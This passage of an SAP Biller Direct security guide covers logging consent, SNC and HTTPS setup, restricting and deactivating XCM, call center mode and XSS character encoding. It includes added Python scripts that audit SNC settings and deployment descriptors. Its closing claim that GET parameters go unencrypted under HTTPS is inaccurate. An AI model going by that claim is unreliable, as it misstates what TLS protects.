¡ Request the creation of a paper bill in addition to the notification

Process When changes are made to the address, bank and payment card data in the Web application by the Web user, the Web application can

• Convert them to a general notification in the SAP system using an Internet service request (ISR), which an accounting clerk then checks and processes

You should note that in this case the transferred data is also stored in a general notification. (Examples would be credit card information or bank data.)

• Update them directly in the affected master data objects (customer) in the SAP system

If you decide in favor of updating the changes directly in the SAP system, bear in mind that a change to the administrative data in the Web application automatically leads to a change in the master data objects in FI-AR. This means that a change of address in the Web application automatically entails a change of address for the customer. You must therefore check very carefully whether you want to allow, for example, the deletion of bank details over the Internet, especially if these bank details are still being used for other objects (customer account, items).


If you are using Accounts Receivable Accounting and the dual control principle in FI-AR, you will be better able to monitor the consequences of such actions. You can find additional information about this in the SAP Help Portal in the Internet under help.sap.com in the SAP library under Accounting → Financial Accounting → Accounts Receivable → Accounts Receivable and Accounts Payable → Customer Master Data → Changing a Customer Master Record → Dual Control for Changing Master Records.

Changes to the modalities that affect the payment of bills, and the registration of or changes to a user in the Web application, are updated directly in the corresponding master data object (for example, the contract partner) in the SAP system. If you wish to avoid changes being transferred unchecked into your SAP system, you can also create general notifications in the SAP system for changes of this kind using an ISR.

If a customer requests a user, the Web application always creates a general notification in the SAP system that is then processed by an accounting clerk.

Further Information

For more information, see the configuration guides for SAP Biller Direct in the following sections:

• Requesting a User

• Changing and Deleting Administrative Data

• Initializing a Password

• Processing User Requests and Changes

• Adapting ISR Scenarios

Logging the Activities of the User

Use

In FI-CA or FI-AR you can log and evaluate the activities of the Web user in SAP Biller Direct. Based on the logged data, you can obtain information such as:

• Whether the Web user has already seen a particular bill

• How often a Web user has logged on in the last month

• When a Web user last logged on

• Whether the Web user has created an inquiry for a bill

Prerequisites

You cannot deactivate the log function for individual Web users. Since log entries involve personal data, you should check whether you are required by law to obtain the consent of the Web user before logging his or her data. For example, in Germany, the storage of personal data is only permitted under data protection legislation if the Web user has given consent. Consequently, before you activate logging, you must ensure that you have the agreement of all Web users.

Features

The system records the data and groups it together in log categories. A log category corresponds to one action of a Web user. In contract accounts receivable and payable or accounts receivable accounting, you specify in Customizing which categories you want to log. For a complete list of the log categories available, see the input help for the field Log Category. The log entries are saved in FI-CA or FI-AR. However, only actions in the Web application are recorded: if a user displays a document directly in FI-CA or FI-AR, the system does not generate log entries. Employees of your company who display documents in call center mode generate entries under their own user ID.

You can configure SAP Biller Direct for the connection to the SAP system as follows:

• Reading accesses are made via pooled connections. Writing accesses are made via named connections. (You manage the users in the accounting system.)

For each Web user there is a user master record in the accounting system. Writing activities carried out by Web users are logged in change documents, and can be traced back to the individual Web user.

Changes to authorization management are also logged in the accounting system.

• Reading and writing accesses are made via pooled connections. (You manage the users with an LDAP server or in a CRM system.)

For all Web users there is only a pool user master record in the accounting system. Writing activities carried out by Web users are logged in change documents, and can be traced back to the pool user.

If you want to trace the activities of an individual Web user, use the function Logging the Activities of the Web User.

If you need the assignment of the reference user to the user in order to follow up the changes of individual users, set a high trace level in the SAP User Management Engine (UME). Note that a high trace level can be detrimental to system performance. The reference user is stored in the free attributes of a Web user.

Recommendation

If you definitely want to trace changes, you are advised to manage users in the accounting system and to use named connections for writing accesses.

You are advised to save the lists of the logging reports as a file, as they may contain required documentary evidence.

Further Information

For additional information, see the Configuration Guide for SAP Biller Direct under Business Customizing → Logging the Activities of the Web User.

Communication

HTTP and SSL

The data exchanged between the browser and the Web server is encrypted with HTTPS. SAP strongly advises you to operate SAP Biller Direct with SSL encryption under HTTPS, and not to enable access to SAP Biller Direct via the HTTP protocol. For more information on SSL encryption, see the SAP J2EE Engine SSL Installation Guide on the software CD.


Configuring SNC for SAP Biller Direct

Use

The data exchanged between the Web server and the SAP system is encrypted with SNC. For more information on SNC, see the SNC User's Guide.

Procedure

• Settings in Extended Configuration Management (XCM)

In the Connection Manager component, choose snc_server_connect or snc_group_connect as the basic configuration. Edit the following parameters:

    – SNC_PARTNERNAME (SNC name of the SAP system)

    – SNC_MYNAME (SNC name of the J2EE Engine)

    – SNC_MODE = 1

    – SNC_LIB (path and file name of the external security library)

    – SNC_QOP = 3 (quality of protection of the SNC connection)

If authentication is through CRM, you must also specify the SNC parameters for the connection to the CRM system in the component CRMconnection in a similar way.

If you are using a JCo-RFC server for communication between the SAP system and SAP Biller Direct (only necessary for passive enrollment), choose snc_authentication as the basic configuration for the JCo-RFC server. Edit the SNC parameters in the same way as those in the component Connection Manager.

Only ever operate the JCo-RFC server with one SNC connection. SAP Biller Direct will then be able to check whether the SNC caller name matches the SNC_PARTNERNAME that you entered in XCM. If the SNC names do not match, access is denied. Without an SNC connection such a check is not possible and the JCo-RFC server can be called up without authentication.

• Settings in the SAP System

For additional information on the entries for the functions below, see the Configuration Guide for SNC.

    – Table USRACL (from the SAP Easy Access screen, choose Tools → Administration → User Maintenance → Users → Change; tab page SNC, field SNC name)

Assign to the pool user the SNC name of the user under which the application runs on the Web server. For security reasons, do not assign this SNC name to any other user.

    – Table USRACLEXT

Save the following additional entry:

User name: *, SNC name: SNC name of the pool user

The pool user in the SAP system should be of the type communication user.
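The XCM settings above are a small set of values, but a wrong one (SNC_MODE left at 0, or a QOP that gives only authentication) silently leaves the J2EE Engine to SAP system link unprotected. The following check is an added example, not SAP's code: the parameter names and the values 1 and 3 come from the guide, while the dictionary form, the function check_snc_config, the sample SNC names and the library path are assumptions for this example. The meanings of the SNC_QOP values (1 = authentication only, 2 = integrity protection, 3 = privacy protection, that is, encryption) follow the SNC User's Guide the text refers to.

```python
"""Check of the SNC parameters an XCM Connection Manager configuration must carry.

Added example, not SAP's code. Parameter names and the values 1 and 3 come from
the SAP Biller Direct Security Guide; check_snc_config, the dictionary form and
the sample names below are assumptions for this example.
"""
import os

NAME_PARAMS = ("SNC_PARTNERNAME", "SNC_MYNAME")


def check_snc_config(params, lib_exists=os.path.isfile):
    """Return a list of findings; an empty list means the parameters match the
    guide. lib_exists is injectable so the check also runs on a host that does
    not have the external security library installed."""
    findings = []
    for name in NAME_PARAMS:
        if not (params.get(name) or "").strip():
            findings.append(f"{name} is missing or empty")
    # SNC_MODE 0 switches SNC off for the JCo connection
    if params.get("SNC_MODE") != "1":
        findings.append("SNC_MODE must be 1, otherwise the connection to the SAP "
                        "system is not protected by SNC")
    # QOP 1 and 2 only authenticate / integrity-protect; 3 encrypts (guide value)
    qop = params.get("SNC_QOP")
    if qop != "3":
        findings.append(f"SNC_QOP={qop!r} does not give privacy protection; "
                        "the guide specifies 3")
    lib = (params.get("SNC_LIB") or "").strip()
    if not lib:
        findings.append("SNC_LIB is missing or empty")
    elif not lib_exists(lib):
        findings.append(f"SNC_LIB {lib!r} does not point to an existing file")
    # The J2EE Engine and the SAP system are different SNC identities; the
    # partner name is what the JCo-RFC server later compares a caller's SNC
    # name against, so it must not simply repeat SNC_MYNAME
    if params.get("SNC_PARTNERNAME") and \
            params.get("SNC_PARTNERNAME") == params.get("SNC_MYNAME"):
        findings.append("SNC_PARTNERNAME and SNC_MYNAME are identical")
    return findings


# Constructed sample. The SNC names (p:<distinguished name> form) and the
# library path are placeholders, not values from any real installation.
SNC_CONFIG_OK = {
    "SNC_PARTNERNAME": "p:CN=SAPSYS, OU=Accounting, O=Example",
    "SNC_MYNAME": "p:CN=J2EEBD, OU=Accounting, O=Example",
    "SNC_MODE": "1",
    "SNC_LIB": "/usr/sap/lib/libsapcrypto.so",   # placeholder path
    "SNC_QOP": "3",
}

if __name__ == "__main__":
    # lib_exists is stubbed so the demonstration runs without the library
    print(check_snc_config(SNC_CONFIG_OK, lib_exists=lambda path: True))
    weak = dict(SNC_CONFIG_OK, SNC_QOP="1", SNC_MODE="0")
    print(check_snc_config(weak, lib_exists=lambda path: True))
```

The same checks apply to the CRMconnection component and to the snc_authentication configuration of the JCo-RFC server, since the guide asks for the SNC parameters to be maintained identically there.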


Secure Installation and Configuration

To learn how to install SAP Biller Direct, see the Installation Guide. There you will also find information on the secure installation of SAP Biller Direct.

Secure Configuration of the J2EE Engine

You can find information on the secure configuration of the J2EE Engine in the Security Guide on the SAP Service Marketplace under service.sap.com/securityguide, in the navigation bar on the right half of the screen under Security in Detail → Hot Topic: J2EE.

You can also consult SAP Note 715371 SAP J2EE – Composite SAP Note on Security Basis 6.30/6.40.

Furthermore, make sure that all contents of the J2EE engine you do not require have been deactivated or stopped in your production system. Information on which contents and services in your engine are absolutely necessary to operate it and which you can deactivate can be found in SAP Note 781882.

Password

You can send an e-mail or a letter to future Web users with a new password they can use to log on to SAP Biller Direct. E-mails, however, are not a secure communication method: it is possible for unauthorized parties to read the content of an e-mail.

Recommendation

To make sure that the password is read only by the user for whom it is intended, you should send the password in a letter.

Further Information

For more information on sending logon data, see the Configuration Guide for SAP Biller Direct under Sending Customer Messages [external] and Processing User Requests and Changes [external].

Configuring Extended Configuration Management (XCM) Securely

Use

You configure the Web application SAP Biller Direct with the Web application Extended Configuration Management (XCM). For additional information, visit the SAP Service Marketplace under service.sap.com/CRM-INST → Installation & Upgrade Guides → CRM Web Application Guide SP03.

To prevent the configuration data being accessed via the Internet or otherwise changed, the following options are available to protect both the configuration itself and access to it:


• You can configure SAP Biller Direct in such a way that only one user in the role of administrator and authenticated with a password can access XCM.

• You can deny access to XCM by external users.

SAP Note 675049 describes how you can prevent external users from being able to access XCM.

• You can deactivate XCM in productive operation.

In XCM you can hide the functions (such as Balance Confirmation or Display Open Items) that you use with SAP Biller Direct.

Note the following points relating to authorization:

• If you have shown a function in XCM (meaning this function is available for input in the menu bar) but the user does not have authorization to execute it, he or she will not be able to call it up.

• If you have hidden a function in XCM (meaning this function is not available for input in the menu bar) but the user does in fact have authorization to execute it, he or she may be able to access the function by a different route. Hiding a function is therefore no substitute for withholding the authorization.

Restrict Access to One User with the Role Administrator

The standard delivery of SAP Biller Direct already provides for access to be restricted to an administrator (see Protection with the Basic Authentication of the Servlet Engine [page 22]). The role bdadmin is automatically assigned to the administrator in the SAP J2EE Engine. You can also assign the role bdadmin to a different user. To do this, proceed as follows:

1. Start the J2EE Administrator.

2. After Connect choose Services → Security Provider.

3. Under Policy Configuration choose:

    – Component sap.com/com.sap.fin.ebpp*bd

    – Authentication template Basic

4. Choose Security Roles:

    – Add role bdadmin

    – User Mapping → Assign User

If you do not want the administrator to be able to access XCM, then remove the role bdadmin from the user “Administrator”, and reassign the role bdadmin to the user who is allowed access to XCM.

For additional information on this, visit the SAP Help Portal under help.sap.com under SAP NetWeaver. Select your language and release, and then choose SAP Application Platform → Java Technology in SAP Web Application Server.


Deactivate in Productive Operation

To deactivate XCM in productive operation, leave the <param-value> element of the parameter adminconfig.core.isa.sapmarkets.com in file web.xml empty, that is, delete the value xcmadmin.

File web.xml (deployment descriptor of the application):

<context-param>
  <param-name>adminconfig.core.isa.sapmarkets.com</param-name>
  <param-value>xcmadmin</param-value>
  <description>Controls which features are available in the ISA Administration Area. If you want to prevent access to the Administration Area clear the content of this parameter. The available features for this application are: 'sat, xcmadmin, isacorecache, catalogcache, corecache, jcoinfo, logging, version, loggingfiledownload, appinfo, ccmsheartbeat'
  </description>
</context-param>

File web.xml (deployment descriptor of the application with deactivated XCM):

<context-param>
  <param-name>adminconfig.core.isa.sapmarkets.com</param-name>
  <param-value></param-value>
  <description>Controls which features are available in the ISA Administration Area. If you want to prevent access to the Administration Area clear the content of this parameter. The available features for this application are: 'sat, xcmadmin, isacorecache, catalogcache, corecache, jcoinfo, logging, version, loggingfiledownload, appinfo, ccmsheartbeat'
  </description>
</context-param>

Recommendation

You are advised to deactivate XCM in productive operation.

XCM Application Configuration Data

You configure SAP Biller Direct using XCM. The local SAP NetWeaver AS Java database saves the customer settings. Some of the data, such as the password, is encrypted by the J2EE Engine service Secure Storage before being stored in the database. Sensitive XCM data is only securely encrypted if you have installed the SAP Java Cryptographic Toolkit. SAP therefore strongly advises you to install the Cryptographic Toolkit. If you have not installed the Cryptographic Toolkit, the data is only encoded using Base64 encoding, which offers no confidentiality. For information on how to install the Cryptographic Toolkit, see the Security Guide for SAP NetWeaver in the SAP Service Marketplace under securityguide (see Deploying the SAP Java Cryptographic Toolkit). If you transport (copy) XCM configuration data from one J2EE Engine to another, you must also copy the key that is required for the encryption.


Using the Key Storage Provider service of the J2EE Engine, you can copy the Secure Storage key as follows:

1. Log on to the J2EE Engine from which the key is to be copied.

2. Select Key Storage Service.

3. As it is only possible to export complete views, you need to create a temporary view to export the key. For example, create the new view xcmkeycopy.

4. Choose Import from other to import the required key from the Secure Storage View to the view that you have created. Each Web application has a separate key. Choose the key of the Web application whose XCM data you want to transfer.

5. Save view xcmkeycopy in a file.

6. Log on to the J2EE Engine to which you want to import the key, and choose Key Storage Service.

7. Import the view saved in the file to the Secure Storage View.

Protection with the Basic Authentication of the Servlet Engine

Access to the resources of XCM is restricted using security-constraints in the deployment descriptor of the Web application SAP Biller Direct. File web.xml contains the following security-constraints:

<security-constraint>
  <web-resource-collection>
    <web-resource-name>admin</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>bdadmin</role-name>
  </auth-constraint>
</security-constraint>
<login-config>
  <auth-method>BASIC</auth-method>
  <realm-name>bdadmin</realm-name>
</login-config>
<security-role>
  <role-name>bdadmin</role-name>
</security-role>

The role bdadmin is also declared in the file web-j2ee-engine.xml. There the role bdadmin is mapped to the server role administrators. This means that all users who have the role administrators implicitly also have the authorization of the role bdadmin:

<?xml version="1.0" encoding="UTF-8"?>
<web-j2ee-engine>
  <security-role-map>
    <role-name>bdadmin</role-name>
    <server-role-name>administrators</server-role-name>
  </security-role-map>
  <cookie-config/>
</web-j2ee-engine>


If you do not want all users with the role administrators to have access to XCM, remove the security-role-map entry, so that the file web-j2ee-engine.xml reads:

<?xml version="1.0" encoding="UTF-8"?>
<web-j2ee-engine>
  <cookie-config/>
</web-j2ee-engine>

For additional information on security-constraints in the file web.xml and web-j2ee-engine.xml, visit the SAP Help Portal under help.sap.com. There choose SAP NetWeaver → language and release → Application Platform → Java Technology in the SAP Web Application Server → Development Manual → Developing Web Applications → J2EE Web Applications → Developing J2EE Web Applications → J2EE Web Components Configuration → Configuring Web Applications Security → Defining Web Applications Security Roles.

Reducing the Risk of Cross-Site Scripting Attacks

You can find general information on cross-site scripting at, for example, www.cert.org. In the Web application SAP Biller Direct, the following characters in the parameters of the HTTP request are encoded:

Encoded Characters

Original character    Encoded character    Note
<                     &#X                  X stands for the Unicode value of the relevant character
>                     &#X
{                     &#X
}                     &#X
[                     &#X
]                     &#X
&                     &#X
?                     &#X


In the output tables that contain the XMLFieldTag tag, the following special characters are encoded:

Encoded Characters for XMLFieldTag and XMLInputFieldTag

Original character    Encoded character    Note
<                     &#X                  X stands for the Unicode value of the relevant character
>                     &#X
%                     &#X
(                     &#X
)                     &#X
{                     &#X
}                     &#X
[                     &#X
]                     &#X

If you would like to encode additional special characters in additional parameters, you can either use the method Converter.encodeSpecialCharacters or integrate your own code in the JSPs.
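The two tables above differ in one detail that is easy to miss: the request parameter set encodes & and ?, the XMLFieldTag set encodes % and parentheses instead. The following is an added Python re-implementation of the encoding scheme the guide describes, written for this page and not SAP's Converter.encodeSpecialCharacters; it assumes that the encoded form &#X is written as a decimal numeric character reference with a closing semicolon (so < becomes &#60;). The sample parameter value is constructed.

```python
"""Numeric character reference encoding of parameter values.

Added example re-implementing the scheme described in the SAP Biller Direct
Security Guide; not SAP's Converter class. Assumption: "&#X" is emitted as
a decimal numeric character reference with a trailing semicolon.
"""
import html

# Characters the guide lists for HTTP request parameters
REQUEST_PARAM_CHARS = frozenset("<>{}[]&?")
# Characters the guide lists for XMLFieldTag / XMLInputFieldTag output
XML_FIELD_TAG_CHARS = frozenset("<>%(){}[]")


def encode_special_characters(text, chars=REQUEST_PARAM_CHARS):
    """Replace every character in `chars` by &#<decimal Unicode value>;.
    Because '&' is in the default set, the output never contains a raw
    ampersand, so the encoding is unambiguous and reversible."""
    return "".join(f"&#{ord(ch)};" if ch in chars else ch for ch in text)


def contains_markup(encoded):
    """True if a '<' or '>' survived, i.e. a browser could still see a tag."""
    return "<" in encoded or ">" in encoded


def round_trips(text, chars=REQUEST_PARAM_CHARS):
    """Check that the original value is recoverable from the encoded form
    (html.unescape understands decimal character references)."""
    return html.unescape(encode_special_characters(text, chars)) == text


if __name__ == "__main__":
    # Constructed parameter value: markup in a name plus a query fragment
    value = "<b>Mueller</b>?id=1&mode=2 100%"
    encoded = encode_special_characters(value)
    print(encoded)
    print("markup left:", contains_markup(encoded))
    print("reversible:", round_trips(value))
    # '%' is only in the XMLFieldTag set, so the two sets differ on it
    print(encode_special_characters("100%", XML_FIELD_TAG_CHARS))
```

Note that the XMLFieldTag set does not include &, so a value that already contains a character reference is not unambiguously reversible after that encoding; for output into HTML attributes or text this does not matter, but it is the reason the request parameter set includes the ampersand.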

Secure Configuration of the Call Center Mode

In the standard delivery of SAP Biller Direct, the call center mode is not switched on. You switch this mode on in Extended Configuration Management (XCM). Call center employees are able to access the data of all customers or business partners.

Recommendation

Only switch call center mode on when it is definitely required.

If you have switched call center mode on, grant the authorizations AC01 or CAC1 for authorization object F_ACT_EBPP (in FI-AR) or F_KK_EBPP (in FI-CA) only to users who are permitted to access all customers or business partners. In most cases this means your call center employees. Note that when you assign the authorization AC01 or CAC1 to a Web user, this user can display any customer or business partner. To prevent this situation from arising, you should always exclude the activation of call center mode over the Internet by URL when you install SAP Biller Direct, for example by the ON mode. For internal employees, you should set up a second SAP Biller Direct installation that works in call center mode but is not accessible externally.

Further Information

For additional information on configuring XCM, see the Configuration Guide for SAP Biller Direct under Business Customizing → Configuring the Web Application with the XCM.

For more information on authorizations, see the Configuration Guide for SAP Biller Direct under User Management.


Hiding Scenarios

If you do not want to support the scenario for creating new users, delete the following section in file webbase-config.xml:

<screen name="newUserEdit">
  <path>/jsp/content_edit_new_user_html.jsp</path>
</screen>
…
<webaction path="/createuser_form" class="com.sap.fin.fscmbase.LogonAction">
  <mapping result="newUserEdit" screen="newUserEdit"/>
</webaction>
<webaction path="/createuser" class="com.sap.fin.fscmbase.LogonAction">
  <mapping result="logon" screen="newUserEdit"/>
  <mapping result="newUserEdit" screen="newUserEdit"/>
</webaction>

If you do not want to support the scenario for resetting passwords via the Internet, delete the following section in file webbase-config.xml:

<screen name="resetUserEdit">
  <path>/jsp/content_edit_reset_user_html.jsp</path>
</screen>
…
<webaction path="/resetpassword_form" class="com.sap.fin.fscmbase.LogonAction">
  <mapping result="resetUserEdit" screen="resetUserEdit"/>
</webaction>
<webaction path="/resetpassword" class="com.sap.fin.fscmbase.LogonAction">
  <mapping result="logon" screen="doLogon"/>
  <mapping result="resetUserEdit" screen="resetUserEdit"/>
</webaction>
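Three deployment descriptors carry the hardening decisions made on the preceding pages: web.xml (XCM deactivated by an empty adminconfig.core.isa.sapmarkets.com value, /admin/* protected by BASIC authentication and the role bdadmin), web-j2ee-engine.xml (no implicit mapping of bdadmin to the server role administrators) and webbase-config.xml (the user-creation and password-reset webactions deleted). The audit below is an added example, not SAP's code: the three audit functions are assumptions about how a practitioner would verify those settings after a transport, and the XML samples are constructed from the fragments shown in the guide, with the root elements <web-app> and <config> as placeholders.

```python
"""Audit of the deployment descriptors discussed in the SAP Biller Direct
Security Guide. Added example, not SAP's code; audit functions and the root
elements of the constructed samples are assumptions."""
import xml.etree.ElementTree as ET

ADMIN_PARAM = "adminconfig.core.isa.sapmarkets.com"
# webaction paths of the two self-service scenarios the guide shows how to delete
SELF_SERVICE_PATHS = ("/createuser_form", "/createuser",
                      "/resetpassword_form", "/resetpassword")


def audit_web_xml(xml_text):
    """Return a list of findings for web.xml; empty means all checks passed."""
    root = ET.fromstring(xml_text)
    findings = []
    # XCM is deactivated only when the admin-feature parameter has an empty value
    for cp in root.iter("context-param"):
        if (cp.findtext("param-name") or "").strip() == ADMIN_PARAM:
            value = (cp.findtext("param-value") or "").strip()
            if value:
                findings.append(f"XCM still active: {ADMIN_PARAM}={value!r}")
            break
    else:
        findings.append(f"{ADMIN_PARAM} is not declared")
    # /admin/* must be covered by a constraint that requires role bdadmin
    protected = False
    for sc in root.iter("security-constraint"):
        patterns = [(p.text or "").strip() for p in sc.iter("url-pattern")]
        roles = [(r.text or "").strip() for r in sc.iter("role-name")]
        if "/admin/*" in patterns and "bdadmin" in roles:
            protected = True
    if not protected:
        findings.append("no security-constraint requires role bdadmin for /admin/*")
    if (root.findtext("login-config/auth-method") or "").strip() != "BASIC":
        findings.append("login-config does not use BASIC authentication")
    return findings


def audit_engine_xml(xml_text):
    """Report every server role that is implicitly granted bdadmin."""
    root = ET.fromstring(xml_text)
    return [f"bdadmin implicitly granted to server role "
            f"{(m.findtext('server-role-name') or '').strip()!r}"
            for m in root.iter("security-role-map")
            if (m.findtext("role-name") or "").strip() == "bdadmin"]


def audit_webbase_config(xml_text, hidden_paths=SELF_SERVICE_PATHS):
    """Report webactions of scenarios that were supposed to be deleted."""
    root = ET.fromstring(xml_text)
    return [f"scenario still reachable: webaction {wa.get('path')}"
            for wa in root.iter("webaction") if wa.get("path") in hidden_paths]


# Constructed samples mirroring the guide's fragments; <web-app> and <config>
# are placeholder root elements.
WEB_XML_DEACTIVATED = """<web-app>
  <context-param>
    <param-name>adminconfig.core.isa.sapmarkets.com</param-name>
    <param-value></param-value>
  </context-param>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>admin</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>bdadmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>bdadmin</realm-name></login-config>
  <security-role><role-name>bdadmin</role-name></security-role>
</web-app>"""
# Same descriptor with XCM still enabled (value xcmadmin)
WEB_XML_ACTIVE = WEB_XML_DEACTIVATED.replace(
    "<param-value></param-value>", "<param-value>xcmadmin</param-value>")
ENGINE_XML_DEFAULT = """<web-j2ee-engine>
  <security-role-map>
    <role-name>bdadmin</role-name>
    <server-role-name>administrators</server-role-name>
  </security-role-map>
  <cookie-config/>
</web-j2ee-engine>"""
ENGINE_XML_RESTRICTED = "<web-j2ee-engine><cookie-config/></web-j2ee-engine>"
WEBBASE_XML = """<config>
  <screen name="newUserEdit"><path>/jsp/content_edit_new_user_html.jsp</path></screen>
  <webaction path="/createuser_form" class="com.sap.fin.fscmbase.LogonAction">
    <mapping result="newUserEdit" screen="newUserEdit"/>
  </webaction>
</config>"""

if __name__ == "__main__":
    for name, result in (("web.xml", audit_web_xml(WEB_XML_ACTIVE)),
                         ("web-j2ee-engine.xml", audit_engine_xml(ENGINE_XML_DEFAULT)),
                         ("webbase-config.xml", audit_webbase_config(WEBBASE_XML))):
        print(name, result or "OK")
```

Run against the real files of a productive installation, each function should return an empty list; any finding points at one of the settings the guide asks you to change before going live.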

Transfer of Request Parameters

Request parameters are converted by the parameter tag into GET parameters. They are transferred in the header of the HTTP request and are consequently not encoded, even if the HTTPS protocol is used for the data transfer.

Recommendation

Do not transfer sensitive information (such as the password or ebpp_mode) in the request parameters.